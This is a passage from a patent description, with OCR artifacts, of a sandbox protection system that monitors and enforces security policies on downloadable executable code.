`utilized and/or for event logging or other purposes.
`A sandbox protection system according to an embodiment
`of the invention comprises an installer for enabling a received
`MPC to be executed within a Downloadable-destination (de(cid:173)
`vice/process) and further causing a Downloadable applica(cid:173)
`tion program, distributable component or other received
`downloadable code to be received and installed within the
`Downloadable-destination. The protection system also
`includes a diverter for monitoring one or more operation
`attempts of the Downloadable, an operation analyzer for
`determining one or more responses to the attempts, and a
`security enforcer for effectuating responses to the monitored
`operations. The protection system can further include one or
`more security policies according to which one or more pro(cid:173)
`tection system elements are operable automatically (e.g. pro(cid:173)
`grammatically) or in conjunction with user intervention (e.g.
`as enabled by the security enforcer). The security policies can
`also be configurable/extensible in accordance with further
`downloadable and/or Downloadable-destination informa(cid:173)
`tion.
`A method according to an embodiment of the invention
`includes receiving downloadable information, determining
`whether the downloadable information includes executable
`code, and causing a mobile protection code and security
`policies to be communicated to a network client in conjunc(cid:173)
`tion with security policies and the downloadable information
`if the downloadable information is determined to include 55
`executable code. The de